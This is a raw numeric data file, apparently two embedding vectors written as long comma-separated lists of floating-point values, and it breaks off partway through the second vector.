0.006804125,-0.002926603,0.04131442,-0.0066807256,-0.0029632268,-0.0173579,0.024927454,0.03265831,-0.01010079,0.02008149,0.0003119522,-0.0065343785,-0.019342443,0.018242419,-0.008377207,0.006030144,-0.022180203,-0.006861507,0.011446665,-0.022943888,-0.0073186876,0.005034847,0.006020293,-0.00025642724,0.004067787,0.0023428653,0.006872908,-0.0016987658,0.035245072,0.0026623118,0.0025093227,0.006383907,0.0036878863,0.0029001052,0.0073145446,-0.021193642,0.000064701046,0.020707592,-0.015361197,0.008160679,0.0024893698,0.0022488404,0.012775491,-0.021162095,-0.00843351,0.0016504081,-0.0018050682,-0.015266463,-0.031182898,-0.00447447,-0.009814274,-0.0131782675,0.00289292,-0.02518831,0.008390186,0.006047597,-0.0130052855,0.012709051,0.026038041,-0.013323867,-0.024752898,0.022229444,-0.0067339316,0.011152482,-0.00748027,-0.009227551,0.005241895,-0.0035181576,0.06396371,-0.006674621,-0.0071847513,-0.0017858392,0.04204621,-0.004337291,-0.006169159,-0.0021996128,-0.010780571,-0.01462919,-0.005014975,-0.035531364,0.006745046,0.0034879146,-0.017676992,-0.009303722,0.021091796,-0.0072320835,-0.002818853,-0.0104184635,0.00008225318,-0.0140105225,0.029499535,0.004087215,-0.009555205,-0.050415173,-0.008455863,0.018884426,-0.026438816,0.031297527,-0.0064195404,0.00011514538,-0.022238191,0.00030390732,-0.01980264,0.002585213,0.0009266894,-0.009601267,0.009325512,0.005132263,0.022782747,-0.0040599485,0.00045911982,0.0073771323,-0.0075120935,-0.026840992,0.0068383715,0.012672046,-0.0028134314,0.014006274,-0.011678964,0.010301026,0.035645135,0.019183809,-0.024926797,0.011995347,0.009316047,0.0048540635,0.0027442835,0.02264499,0.011813974,-0.002100157,-0.028804092,-0.028287534,0.016656065,0.008634126,-0.014917076,-0.0067072725,-0.0045538745,-0.00045846557,-0.027486417,0.020107966,0.014721104,0.013034195,0.019062709,-0.030316798,0.02776345,-0.016637182,-0.008614753,0.021303711,-0.0008220221,0.011520234,-0.006919205,-0.014646358,0.006410687,0.010106459,-0.0052162316,0.024221767,0.0038773895,0.020335741,0.043366507,0.0015009295,0.0044965176,-0.0082224,-0.023605999,0.004080235,-0.0070307576,-0.022902334,0.0068320013,-0.015205797,-0.014268841,-0.015469388,-0.013939916,-0.007913393,-0.007141655,-0.00015252337,-0.06553399,-0.0027219527,-0.027957922,-0.005106996,-0.016594633,-0.015580862,0.0017784949,0.0409074,-0.015360157,-0.032034297,-0.015680997,0.035255466,-0.0019283775,0.001809437,-0.019803002,0.0076513453,-0.03369269,-0.012823366,-0.017182365,0.011902287,0.02315873,-0.01938315,0.0013266375,0.0025100997,0.0019940329,0.011137066,-0.0058071944,0.021250024,0.0034008238,0.002254206,-0.014217985,-0.009837281,0.004127204,0.013508249,-0.011334501,0.028455805,0.002036234,0.008854354,0.0013954897,-0.00075924967,-0.005174158,0.004425526,0.006342364,-0.000117247975,0.010151641,0.00790189,0.007238214,0.020203147,0.013247409,0.037619352,-0.015071642,-0.015747992,0.005317813,-0.0071763424,0.0032238038,-0.026651457,0.013106724,0.0080630025,-0.0035595046,0.0027507204,-0.008850945,0.008778871,0.010406432,0.0057392716,0.0053947465,0.013652992,0.004423904,0.0051930603,-0.025415381,-0.01564564,0.0053692176,0.009043301,-0.004580322,0.00563686,0.003719635,0.027333125,0.024630692,-0.009504619,-0.019034233,0.009199825,-0.031525668,-0.015963,-0.004111273,0.037960436,-0.0155182,-0.027882844,0.002626088,0.012100646,-0.022722688,0.0073690554,-0.0042480156,-0.0072930953,-0.007402774,-0.029500578,-0.009575013,0.019234473,-0.0013943124,0.0058916365,-0.0059210644,0.013591423,-0.0045663062,0.014772055,-0.016341638,-0.026825203,-0.10719526,0.008812802,0.01959268,0.0017154372,-0.016328244,-0.013375113,0.026491784,-0.0010078896,0.042163685,0.01917282,-0.015396406,0.0059735766,-0.002941099,0.006683677,-0.0028425695,-0.0041164705,-0.020763054,0.0033677837,-0.012901832,-0.0032719595,-0.0054377667,-0.020775666,-0.00095993513,0.012498122,-0.0066181757,0.005098051,0.0055016573,0.035557993,0.030590242,0.002612968,-0.0068560997,-0.0042805257,-0.007033228,0.010860501,-0.023329573,-0.01446704,0.0006994714,-0.01101742,-0.0061993967,0.027890742,0.004041511,0.0055297753,0.032232173,0.017747078,-0.0053809322,-0.015102571,-0.0113113625,0.010632435,-0.0034269867,-0.0012799106,0.013500953,0.010812956,0.019019226,-0.001578507,-0.007918745,-0.016187401,0.008309998,0.013663999,0.0016374271,0.0071400763,-0.010417468,0.015358626,-0.023119818,0.016809419,-0.0011539846,-0.002514502,-0.0035472738,0.017391885,-0.008535774,-0.0027153308,0.0120978,0.012689833,0.0019039771,-0.0071630403,0.028707085,0.005436503,0.0073218,0.026359254,0.034757596,0.009909784,0.015589436,-0.0213635,0.007655443,0.022955758,-0.016505312,0.0010826278,0.009298158,0.010023383,-0.010653773,0.014160564,0.020319356,0.0081010135,-0.018258566,0.014890783,0.029906783,0.019170968,0.05853282,-0.00843536,-0.016305864,-0.013728332,-0.01635004,0.011072082,-0.028747119,0.004856476,-0.028776333,0.0049921675,0.019511765,0.0043078433,-0.011068843,0.006040028,-0.00732504,0.023078792,-0.0197193,-0.003345797,0.0153925,0.011762045,-0.013150825,-0.0070561557,0.0018458657,-0.0032826888,0.0025363427,0.0034008569,0.0090069575,-0.028882269,0.0062588654,-0.029528396,-0.008660187,0.018629838,-0.0025760317,-0.02559883,-0.0058935983,0.029400019,0.012234636,-0.013228579,-0.003580426,0.016456023,-0.019376298,0.010697265,0.008036578,0.0065927706,0.01565694,0.0131981615,0.005607443,-0.0013747502,-0.009679354,0.0030970832,-0.0036092333,-0.004078459,-0.017788053,0.023616739,-0.00065811863,-0.017896289,0.02110082,0.0278977,-0.0081418315,0.0082402965,-0.022141289,-0.0016073524,-0.010959213,0.017694592,-0.01859016,0.01961666,0.022481883,-0.009442149,-0.0059616603,-0.012642037,0.009095643,-0.0018931243,-0.006288103,0.012737506,0.0005093331,-0.0042775976,0.012600497,-0.049153395,0.012169792,0.020161495,0.022108402,0.013300142,0.027029479,0.01596824,-0.017599229,0.014088658,-0.012711678,-0.006572677,0.026220346,0.018337857,-0.008968408,0.0025452569,0.0052113244,-0.0016775103,0.036560975,0.016528776,-0.009714998,-0.025917687,0.0027450023,-0.00072251004,0.0042402307,0.009714669,-0.002576606,-0.009041621,-0.014175682,0.017658675,-0.0022476513,-0.00756211,-0.008311915,0.018555906,0.0000650346,0.014128137,0.000089202105,-0.009577304,-0.012742248,0.0039951527,-0.012824152,0.0011177409,0.008073953,0.001089071,-0.0149388425,-0.015683612,-0.00428025,0.023657324,-0.00031568622,-0.0386646,0.006563475,-0.018969854,0.01151029,0.0193512,0.03551896,-0.00080050406,-0.01310299,-0.008880223,-0.005374653,0.003997659,-0.043852057,0.0035694235,0.03182913,-0.0008297476,0.0033831324,-0.0041448968,-0.0037306582,-0.0074791107,0.026635934,0.02198605,0.02072814,0.027108826,0.013280058,-0.013517936,-0.00087328063,0.0063646017,0.0032220266,0.043985244,0.0042503937,-0.0077532525,0.003281409,0.0019324479,-0.005843496,0.0028970519,-0.0034914184,0.0004580184,-0.0029886032,0.022169746,-0.0019280299,-0.009356086,-0.006785394,-0.009406953,-0.002868363,-0.00706628,-0.010056757,-0.033146754,0.003089445,-0.0019814193,0.010419276,0.0019441824,-0.0072640674,0.031540267,-0.0064864666,-0.0075956113,-0.01399353,0.012422653,0.021288477,0.0085355155,0.0047790897,-0.008071835,-0.003167519,0.027002363,-0.0016286417,0.020707816,0.013966699,0.003982114,-0.0015913125,-0.010825041,0.015138893,-0.0021755027,-0.0016003248,0.008676476,-0.01916027,0.0072740456,0.011225644,0.0018111349,0.015828757,-0.0010447841,0.0142518245,-0.0076721595,-0.016459405,-0.0023692187,0.0017153088,-0.003263883,0.0012014452,0.00528481,-0.016375026,-0.02221108,-0.019654028,0.01616672,-0.01116126,0.022342574,0.020904616,0.0056248875,0.011127773,0.016840251,-0.046725854,-0.009858957,-0.010487123,-0.017481558,0.012580943,-0.018465102,0.015196578,0.008453548,0.0029574684,0.033743102,-0.008714132,0.006823836,0.027941903,-0.01914835,-0.0033677786,-0.0016969471,0.021150274,-0.009347885,0.016301744,0.02414283,-0.021588562,0.01597619,-0.00464081,0.019185163,0.0071267984,-0.010099658,0.018413996,0.011894439,0.0007098607,-0.012024653,-0.008686179,-0.0027379475,0.002278698,0.0035722782,-0.013812997,-0.0063428427,0.0012947043,0.01591158,-0.009527325,-0.012302378,0.0135326,-0.008268418,-0.009141637,0.007062536,-0.010299265,-0.004551667,0.0095428685,0.0017990043,-0.00046306796,0.0047801496,-0.01896544,-0.0037692036,-0.018293524,0.02000304,-0.017896205,-0.016930962,0.014158386,-0.10479318,-0.0035173178,0.01678819,0.012695398,0.06408862,0.00826891,-0.01585477,0.00082058547,-0.015822804,0.0071405824,0.008068103,-0.0084235,-0.020239491,0.010843293,0.03773733,-0.0042155473,-0.013854491,0.005012574,0.007146615,-0.02074514,0.009528441,0.01563547,-0.022568557,0.0008453115,0.02633547,-0.0028227128,-0.0049616313,0.00011931567,-0.007474779,-0.01532877,-0.03024899,0.0030619858,0.00888868,-0.001946704,0.009306073,0.0032173414,-0.008505812,0.014177609,-0.012697626,-0.029174022,-0.00819234,0.013596673,-0.00677656,-0.013448845,-0.017507005,0.008824503,-0.031109447,-0.010096825,-0.0041580233,-0.01629126,-0.015392508,-0.006953282,0.0046862136,0.0053616804,-0.0011966398,0.020955358,-0.012401047,-0.006203612,0.026706342,0.0002626466,-0.015018825,0.0004535936,0.0014792966,-0.008904115,-0.008033978,-0.0060012457,0.01158889,0.019832842,0.0074221417,-0.00703009,0.004513893,-0.043257706,-0.011295012,-0.013848164,-0.00037251785,0.008256369,0.0084499065,-0.013893101,0.0055060997,0.02546402,0.029905925,-0.0061542736,0.02168921,0.0066981614,0.007893366,0.0024275868,-0.016185874,-0.012701175,0.015680563,0.00068205025,-0.015864484,-0.01570894,0.035820942,-0.00007977317,0.014332857,0.014833493,-0.003837497,0.006045388,0.011157759,0.019691158,0.007893184,-0.011163008,0.0018970126,-0.008496712,-0.028031167,0.00038036305,0.005800656,0.0015063534,-0.011090408,-0.010674378,-0.015837383,0.019286614,0.019941136,0.04520435,0.026326502,0.018003166,-0.0054003187,0.021099782,-0.010999032,-0.010469666,-0.013698018,-0.009124248,-0.021149756,0.018638276,0.018551718,-0.0024306434,0.011179176,-0.0071901507,-0.0066191815,0.01274471,-0.007686483,0.03194883,0.010405265,0.016972564,-0.007302687,0.0076285056,-0.0007163189,0.015468338,-0.0037489245,0.027399115,-0.01197394,-0.024882399,-0.0038376956,0.0032744252,-0.025796337,0.01858054,-0.006232556,0.007996307,0.02849454,-0.023445698,-0.005315671,-0.002544841,-0.005729477,0.007857612,-0.0030303816,0.007766209,-0.0064225136,0.003254073,-0.024984296,0.0038099205,-0.0019759126,-0.006291053,0.0056185164,0.0008993264,-0.042844214,0.013554248,0.017710032,-0.01102036,0.005533379,0.00065687904,-0.01633708,-0.0031792335,0.0006685108,0.010094912,-0.032618243,-0.0012026791,0.045257784,0.011375354,-0.014169237,-0.00600835,-0.018942779,0.0027980863,-0.014257677,-0.029843891,-0.005884419,0.0044355216,0.0039620087,-0.0077869575,0.022341877,0.010998687,0.00009796409,-0.010917041,-0.00052912004,-0.016980937,-0.006469988,-0.014203199,0.010455681,-0.011179517,-0.0058552423,0.02056438,-0.0053686243,0.007698712,-0.008211529,0.011944958,0.02335594,0.023377206,0.0010734884,0.009476551,-0.011443962,-0.00015697944,-0.024701303,-0.0053838547,0.018453253,0.106553555,0.00978727,-0.013646612,0.016667012,0.026156384,0.0023242603,0.022365632,0.0038454598,-0.008581485,0.0010347326,0.019184016,-0.014219563,0.008296017,-0.009021715,0.0008826354,0.017440703,0.008220711,-0.03399268,0.031183159,-0.008523176,0.0029682475,-0.03401947,-0.002983073,-0.05151396,-0.0027138668,-0.07329919,0.029775996,0.009173363,-0.0028250266,0.01839465,-0.0013276723,0.0031542839,0.0025347357,0.015857363,-0.019004555,0.020940512,0.0078442795,-0.011718686,0.0026776528,-0.008174692,0.027992887,-0.0004783274,-0.0041918736,-0.0076341075,-0.014586613,-0.01582171,-0.000044163222,-0.0087187,0.010305096,-0.0025472897,-0.008039527,-0.008331353,0.0042701964,-0.019496027,0.006534422,-0.010932909,0.00016252648,0.008162465,-0.009223611,-0.013154644,0.029569391,0.015884398,0.00929886,-0.009407036,0.011081203,0.0027368164,-0.013064242,-0.020854494,0.012865966,-0.0048690066,0.0034919516,-0.04071455,0.005414952,0.0009893043,-0.0020315773,0.005152382,-0.010433787,-0.017694462,-0.0032169158,0.022687051,0.0051679476,0.005788734,0.01800215,0.0054408433,0.00900792,0.016969634,0.0017818307,0.013867966,-0.011603092,-0.0044069686,-0.024992138,0.01806107,0.022581931,0.011401504,0.002742573,-0.003765617,0.009467352,-0.0046356223,-0.006779326,0.00077082025,-0.017778708,0.009826953,0.0037477727,0.013757275,-0.009770652,0.005699928,0.002492729,0.005752208,-0.0037793026,-0.011906017,-0.00946487,0.002655648,0.008018671,0.014621493,-0.008143374,0.03609472,-0.014308428,-0.0030516216,0.02130954,-0.01317375,-0.013796258,0.017243898,0.012076627,0.025815854,0.0087671755,0.018038018,-0.0065709907,0.0046091303,-0.009888817,0.0016388526,0.0007323286,-0.013520535,0.007341932,0.027874608,0.000015532905,0.014359597,0.023335112,0.008661998,0.0010745723,-0.0011263142,0.01161459,-0.015664056,-0.019253494,-0.008593448,0.012929121,-0.036746483,0.02062031,-0.003562091,0.03384822,-0.017488873,-0.0094802575,0.007410314,-0.013553702,-0.009771187,0.011006286,-0.009240094,-0.011151911,0.0058228713,0.0020356518,-0.014435688,0.0034394949,0.016676692,-0.019847251,-0.05134483,0.031045532,0.021628639,0.018273205,0.000206897,-0.022769235,-0.0029021674,0.0009026341,-0.013608932,0.0030789303,0.003289005,-0.016765658,0.002261262,0.0075091654,0.009446922,-0.011422832,-0.009452148,0.028909305,-0.008142777,-0.0012194348,-0.0028070214,0.017000077,-0.00436862,0.007422871,-0.011531508,-0.017944863,0.022780834,-0.009482652,-0.008925665,-0.009514128,0.0012293336,-0.008094984,0.020075,-0.019663243,0.048071768,-0.034522187,-0.03207999,0.00416973,0.0064401906,0.0013351445,-0.009222891,0.010707192,-0.004161752,-0.008610119,-0.014988418,-0.0023357617,-0.005688964,0.013750826,-0.015254016,0.0091957655,-0.022384468,0.0041716844,-0.015791921,-0.013440608,-0.009247184,0.004891372,-0.0034573446,-0.00081678724,0.0010298336,0.0063885553,-0.029674416,-0.0063425843,0.025499364,-0.016371695,0.015961614,0.008944378,-0.025561307,-0.02938771,-0.007981094,-0.0005265188,-0.00613193,-0.0014113117,0.014294454,0.017233567,0.019396244,-0.002295234,-0.00022617725,-0.0058666826,0.008904681,0.017861037,-0.011752377,-0.020940071,0.019082606,-0.0023269968,-0.017485041,-0.008448479,-0.011148786,-0.026113609,-0.004430731,-0.023837214,-0.019303061,-0.021775888,-0.014093803,0.002342939,0.016099732,0.00980405,-0.019702014,-0.005048741,0.025397366,0.0070927576,0.00067421346,-0.012988745,-0.0038765613,0.0061635794,-0.02038363,-0.0142543875,0.010291756,-0.005584191,0.0073058815,-0.009040618,0.01563088,0.0023933589,0.011611183,-0.0056212894,0.005622713,-0.0061109825,-0.009936429,0.019206796,-0.0052359067,0.015520865,-0.026834603,-0.021503042,0.01420514,-0.0033934736,0.004875988,0.06336681,-0.06501877,-0.009824135,0.011472767,0.010591759,-0.020630764,0.029067095,-0.017059313,-0.041653976,-0.024262091,0.011250422,0.004904416,-0.005595406,-0.031472035,-0.009141536,0.006329992,-0.021380516,0.011874832,0.011179745,-0.0028226634,-0.013625588,0.010856816,-0.006757746,0.0020382127,-0.009762667,-0.007920132,-0.019323152,0.000014212147,0.023173226,0.003919899,0.023331026,0.0061854995,0.0029681376,-0.010338686,-0.001973431,-0.0029495794,0.0026707193,0.016146397,0.012711791,-0.020914784,-0.02896505,-0.003986626,0.00905666,0.01947482,0.012468699,-0.0058944994,-0.028828511,0.029776081,-0.008569145,0.13795917,-0.014307391,-0.0033450895,-0.0025885848,0.008773787,-0.0107827,0.015691947,0.028788676,0.011556405,0.011452777,0.013180685,-0.005383962,-0.00688028,0.015943784,-0.01380966,-0.009227155,0.0037820158,0.15873633,-0.02003607,0.02181219,0.0054120943,0.0029340617,0.019240936,0.019689621,0.00101774,-0.07474307,0.0047890837,-0.033744693,-0.008828736,0.013328194,-0.027813375,0.013248456,0.014868028,-0.0059145284,-0.019435065,0.0095024835,-0.00022966179,-0.009385303,-0.03566506,0.0020648593,0.02250162,0.0047143865,-0.0069131847,0.021020126,-0.015642522,0.009021041,-0.023562131,0.022086022,0.0061273286,0.019834034,0.024183115,0.0024299822,0.030445475,-0.01364013,0.009767738,0.007922156,0.00395548,-0.006452307,-0.036153823,0.011702564,-0.002393549,0.016576173,-0.014170697,0.02162279,-0.018810859,0.008365604,-0.017446052,0.0016645602,0.0027485995,0.010734574,0.011355285,0.016877405,-0.018598069,-0.021410706,0.042541254,-0.0010178282,-0.01186146,0.0056549925,0.028919492,-0.0011329087,0.027868118,0.019709624,-0.007102921,-0.007001807,0.0120127145,0.0033460793,-0.0006342414,0.012838443,0.0074551585,-0.0002479768,-0.02023278,0.013402996,-0.012190908,-0.006622148,0.021829097,0.019179605,0.013812932,-0.0020032104,-0.014133422,-0.014998345,-0.007086182,0.02498894,0.017843923,-0.023647577,-0.016471704,0.0028640013,-0.011496751,-0.038818248,-0.019637417,0.0024606644,0.011414832,0.00069871783,-0.009785082,0.01809474,-0.01989825,-0.0029379972,-0.007928619,0.010073986,-0.037320044,-0.003359286,0.0056252386,-0.0025023983,-0.0009591648,0.0057794144,-0.015107602,0.0034042648,0.014483092,0.035425626,-0.004670529,-0.0063232617,-0.016759112,-0.008242521,0.009552239,0.047831174,0.0013771725,-0.013305401,0.022775253,-0.045862135,-0.030085348,0.014710219,0.009767149,0.008739961,0.0030365207,0.017424008,-0.0007849457,-0.004125544,-0.02174284,-0.014579072],[-0.01330559,-0.018347051,-0.020317752,-0.029431606,0.009143415,-0.019304935,0.0058415136,0.03821504,0.0013385676,-0.013946795,-0.008350432,0.043921903,0.020836892,-0.0019668401,-0.01651312,-0.009845756,0.021882728,0.0015705399,0.0022726567,-0.001672802,0.007833601,-0.008123473,0.010784124,-0.02188206,0.006762113,-0.014088748,-0.0035014981,0.006170922,0.0023799501,0.011785451,0.0100754425,0.028642716,0.0022523338,0.0037379072,0.0048072287,0.011216717,-0.015242769,-0.009421312,0.0074134013,-0.0032239007,0.0024270632,0.0107124075,0.013515808,0.026227513,-0.012876183,-0.0058716508,0.008458701,0.010768091,-0.014715238,0.010801524,0.0011407529,0.0075066476,-0.029862707,0.0014866014,-0.003433827,0.023938296,-0.000054539985,-0.023278771,-0.003919332,-0.0016351219,-0.010838948,0.02440085,-0.017078497,-0.020365627,0.014479225,0.010862437,0.0022113645,-0.0037298244,-0.01089449,-0.015750444,-0.007053347,0.0026228374,-0.0019153923,0.013849065,0.015165383,0.0006989745,0.0025446152,-0.027342347,-0.013065714,0.016347628,-0.018895308,-0.014580962,-0.01675084,-0.004496901,0.0018192291,0.0118355015,-0.01512076,-0.008550173,-0.0026261923,-0.03271595,-0.012845903,0.0075976425,-0.0034762062,0.0075213304,-0.017186664,0.02516585,0.017477956,0.0059739994,-0.0044884174,0.009283523,0.0054350384,-0.0068171895,-0.041377954,0.007552208,0.020221364,-0.0075785522,-0.01397851,-0.0005722721,0.003628262,-0.009692774,-0.004420868,0.008669469,-0.0038729827,-0.02435458,0.0030625628,-0.0032764922,-0.00086437253,0.007489993,-0.017431837,0.0018345152,-0.009474612,0.025295807,0.0057700737,-0.002580047,-0.003456134,0.007975767,0.00013060523,0.009537806,0.006880649,0.00038389745,-0.0017557542,0.014982943,-0.00065310387,-0.004860114,0.0001449368,0.009600789,0.0110476,-0.009248684,0.007812665,-0.031705935,0.025281442,-0.006925485,0.0056192405,-0.0062240623,0.01442524,0.030910864,0.017351238,0.029113801,0.0063996743,-0.01621497,0.005283869,-0.00380812,-0.008133248,-0.012293521,0.009148587,0.01972487,-0.007787341,-0.018746808,-0.011581801,-0.0029193915,-0.017837392,0.0051418887,0.018417094,-0.006410747,-0.026767392,-0.019797023,-0.0028981818,0.0031988071,-0.020606661,0.0044231615,0.01187433,0.02174208,0.0089189345,-0.00084172824,0.004450639,0.0049191695,0.015502984,-0.016381862,-0.0025203936,0.005002706,0.01334183,0.023560049,0.00308177,-0.00011685047,0.00249915,0.018838704,0.007436953,-0.016385527,-0.02994711,-0.008621898,0.005806345,-0.0129287075,-0.01982413,-0.011232169,-0.025112506,-0.025450777,-0.011577928,0.113090485,0.00988911,-0.0062707374,-0.012767577,-0.0053460686,-0.011576909,-0.009986603,0.001032147,-0.011346923,-0.021238197,-0.013315489,0.018589793,0.009896894,-0.0020352479,-0.010675936,-0.009091951,0.013411616,-0.016045662,-0.082773305,0.032526053,0.022851186,-0.013156977,-0.0059167976,-0.02168798,0.015659804,-0.0027780475,-0.028935328,-0.021498442,-0.025675498,-0.0048903455,0.0035429802,0.007457205,-0.024218962,-0.013906858,0.010413926,-0.038233582,-0.009568386,-0.005623316,-0.0062839845,0.013930827,-0.008247036,0.008959916,-0.004652638,0.009608411,0.004897802,0.015109353,0.022652427,-0.016522752,-0.009634771,0.019785564,-0.0024266923,-0.018825201,0.01859404,0.003924108,-0.025552223,-0.01517603,0.025323309,-0.014223944,-0.018661432,0.0008415409,-0.0141331395,0.00606984,-0.005744587,0.011553162,0.0015204842,-0.0043975622,0.048360042,0.050983652,0.0070181317,0.030582506,-0.048881993,-0.0058437036,-0.02375995,-0.017592281,0.004102838,0.0031115122,-0.003953914,0.014625461,-0.013157956,0.019512998,0.008960034,-0.0032609403,0.0120276,-0.004238095,0.0004347865,0.008106933,-0.006398256,-0.003093918,0.0021634216,0.0014455814,0.012675103,0.033247367,-0.0022008342,-0.0072143762,-0.007982258,0.01880961,0.0064027063,-0.0033880798,-0.008821081,-0.024818499,0.0029289497,0.007397191,-0.035672493,0.009641579,0.000100249665,0.023562776,0.004035555,-0.004673685,0.00046443433,-0.009450954,0.0144465845,-0.0031408523,0.018884964,-0.018577224,-0.0053150197,-0.014626394,0.003028126,-0.0020816165,-0.0031119944,-0.003908327,-0.015215931,-0.014936565,-0.01366341,0.024031121,-0.017706726,0.01171092,-0.04125688,-0.013978601,0.006634804,-0.005865185,0.00040173932,0.0037572728,0.017529624,-0.01733264,0.011054438,0.0021376198,0.018089835,-0.0054519894,0.016172878,-0.010913096,0.019491773,0.014539827,0.01620829,-0.012600638,-0.0041111805,-0.023040628,-0.0038844799,-0.0018120642,-0.0011620929,0.0018720779,0.009687994,0.017857725,0.007724034,0.021010464,-0.0052493615,-0.004656233,0.019018093,-0.022159006,-0.01802703,0.00017874883,-0.017789323,0.0007849396,-0.023087153,0.0060982564,-0.008047336,-0.024619456,0.0051011103,0.08159379,0.01151031,-0.009934734,0.001654386,-0.013210394,-0.013637171,0.018031267,0.019510899,0.009953996,-0.009286678,0.009863787,-0.021223182,-0.011810159,0.0036734934,-0.031351816,0.017211571,-0.021766612,-0.0040228465,-0.020177864,-0.018960332,0.03510491,-0.0126020685,0.0004150263,0.010299185,0.0195742,0.019700136,-0.0015870691,-0.011984657,-0.0014332074,-0.011024132,-0.012051493,-0.016732112,-0.00072397327,-0.0015592754,-0.020512413,0.025339585,-0.0010013842,0.014824617,-0.008337772,-0.011239059,0.004378557,0.00390444,0.005191287,-0.014537104,-0.0019352395,0.037478622,0.0032603405,-0.012497943,-0.008808588,0.019274697,0.0040559126,0.026910188,-0.02318708,0.022389425,-0.017706912,0.028944902,0.01757198,-0.043874923,0.029483091,0.034816332,0.013894456,0.0056893993,-0.01767885,0.0051248125,-0.001636531,0.051380042,-0.02188597,0.011401054,-0.0043548048,0.007209354,-0.0015447116,0.012908263,-0.021120062,0.006486932,-0.0095041245,0.01757639,-0.004372574,-0.0016167498,0.0003526298,0.038891442,-0.0033560165,0.016418418,0.016112365,0.015582198,-0.01300933,-0.008013401,-0.012498742,0.014926839,0.017519169,-0.011033312,0.010278223,0.0000676604,-0.0014690297,0.0051293527,0.01707306,0.029296976,0.03265538,0.006407815,-0.0056163655,0.015828867,0.014764723,0.0040992787,0.022561066,-0.017759008,0.0059409384,0.007442744,0.00813654,0.002364597,0.00829342,0.021225905,-0.027988039,0.009137935,-0.01071838,-0.0273297,0.00972153,-0.018443923,-0.007901943,-0.021026563,-0.029735785,0.013708952,0.017967138,-0.013097852,0.0077444552,0.020478863,-0.0108573595,0.0072803716,-0.0072834534,0.0021529591,-0.014065816,0.019773819,-0.0012173835,0.045153607,0.013007233,-0.026071003,0.010025585,0.0098342635,-0.012556464,-0.021663379,0.03385671,-0.00060652586,0.018293584,0.027873168,0.04372341,-0.00012282572,-0.0003933499,0.025291549,0.021499893,0.0047140922,-0.027264263,-0.0045710593,-0.008600768,-0.00038260667,0.013336168,-0.008962889,-0.0023676017,0.021609958,0.022393305,-0.026221616,-0.016660076,0.015051495,0.024125544,-0.031403538,0.00018036713,-0.009757654,-0.019090991,0.017599223,-0.0055676852,0.061020482,-0.012328766,-0.032020956,-0.013709272,0.012880449,0.018656818,-0.0037271916,0.02504642,-0.02262281,0.023334198,0.010157527,0.020428617,0.0048405724,0.016075041,-0.008026865,-0.016090315,0.0059503857,-0.007093655,-0.0019841709,0.0034732975,0.002679608,-0.008592614,-0.0073192413,-0.02725075,-0.010787561,-0.02101064,0.021127284,0.017502967,-0.016447742,-0.019058544,-0.014975426,-0.00044387535,0.018574141,-0.0089186495,0.0070040408,0.006534121,0.02173828,-0.014439701,-0.022374032,0.0345429,-0.014382864,-0.0039674486,-0.007997198,0.04221715,0.032880932,0.023831278,-0.007549474,0.018173743,0.022502214,0.011572594,-0.015117652,0.021749975,0.010505496,0.021833388,-0.023735546,0.003265901,0.020368334,0.011865238,0.0011195214,0.0046724607,-0.0019719852,0.006431758,-0.0013065864,0.004465609,-0.0067326697,-0.00072250044,0.0052261422,-0.008930241,0.007937296,-0.021872697,0.002207006,0.004791009,0.0199991,-0.018361436,0.033113394,0.005738328,0.0016172858,0.024820862,0.014126985,-0.012629709,-0.00033345696,0.006793203,0.0036584355,-0.008214443,0.00916213,0.021569895,-0.010741995,-0.0061355396,0.020242458,-0.004866605,0.0023282245,-0.0075722174,0.008376157,-0.009567271,0.022748185,-0.012112809,0.0065654116,-0.012515319,0.002335499,0.01362604,-0.021556437,0.00067678886,-0.008554716,0.043681193,-0.02178048,0.0029781293,0.013885391,0.013510701,0.003798091,-0.018073356,0.0055944417,-0.0476287,-0.0003831281,0.0030540945,0.00062819157,-0.012424679,0.034300715,0.0069763334,-0.007455556,0.0030067812,-0.0055266884,-0.014861707,0.005410177,-0.007158498,0.006008875,-0.0049594278,-0.007915356,-0.022978157,-0.012063791,-0.042261638,-0.046353605,-0.017225184,0.053805195,-0.0031658232,0.007648019,-0.0012357217,0.014354669,-0.012706306,-0.019191628,0.011998949,-0.024133682,0.0037600289,0.014258901,0.0068991273,0.016416907,-0.009770889,0.0068760593,-0.009706359,-0.036359485,-0.0049198037,0.0041421,-0.00064757356,-0.03435143,-0.006372536,0.005597403,-0.023428593,0.018143568,-0.003914889,0.023605518,-0.0052259653,0.050598655,0.012450075,0.020757105,0.003640333,0.0015336027,-0.00930478,-0.004880337,0.0041495776,0.03292724,-0.009144844,0.012717646,-0.009202297,0.009654419,0.0012311048,-0.012540862,0.015586861,0.027850073,0.03792737,-0.0023173562,0.02524439,-0.017354503,0.005934117,0.018804789,0.014360266,-0.015863286,0.014629174,0.019354315,0.0037638142,0.015367081,0.008192986,-0.00081823935,-0.018487588,0.007836631,-0.012906936,0.018486196,0.019865407,0.011518896,0.008696339,0.009878568,0.002178577,0.0061905175,-0.014203979,-0.001839896,-0.025240758,-0.025280997,0.00084778946,-0.011265307,0.0018889938,-0.049577404,0.0073584467,0.031848755,0.003786418,-0.006264357,-0.008605848,-0.02043265,0.008168694,-0.01911877,-0.035687782,-0.021667626,0.012290207,0.033945926,-0.038547773,-0.0040859655,-0.0015726045,-0.013619108,-0.0030506873,0.02832,-0.0145994825,-0.0042826766,-0.001281813,-0.015941653,0.0061020693,0.022275388,0.023906922,0.005825861,-0.0078922305,-0.009909676,-0.018512491,-0.0028394356,-0.0026818146,-0.00076554785,0.01547817,0.020873897,0.0043433886,-0.008075563,-0.028354263,-0.0075745843,0.011604737,-0.019766899,-0.015169261,-0.010101441,0.004725004,-0.002583575,0.031152029,-0.012330398,0.044539575,0.018424278,0.003356406,0.011092855,-0.012077995,0.01785273,0.025319856,0.01187471,-0.0461136,-0.025387684,-0.0110942125,0.0015325753,-0.020064533,0.006475256,-0.009688116,-0.019621098,-0.016834691,-0.027680855,0.011911811,-0.011044963,-0.00061207736,0.0036083348,-0.025186446,0.035748634,-0.018880086,0.0016076921,0.015107583,-0.009666181,0.00798064,-0.013739007,0.024444908,-0.021648515,-0.005266505,0.0065874006,-0.014946701,0.006496956,0.014368056,-0.029030208,-0.0296041,-0.023311343,0.0106743155,0.0011610888,0.016538713,0.023528563,-0.025166694,-0.0113832895,-0.0033336238,0.008021911,0.0074156844,-0.025731143,0.0014570743,-0.010766704,-0.018443137,0.0081502935,0.019364068,-0.017906396,0.009081905,-0.00059130107,-0.0070394017,0.031556103,0.010617755,0.00980597,-0.010035956,0.008483839,0.009813891,-0.037486486,0.024976062,-0.017835218,0.013273058,0.05429275,-0.017442115,0.004915343,0.0075541674,-0.0110099865,-0.012351207,-0.0041178046,0.02371481,-0.023564743,0.00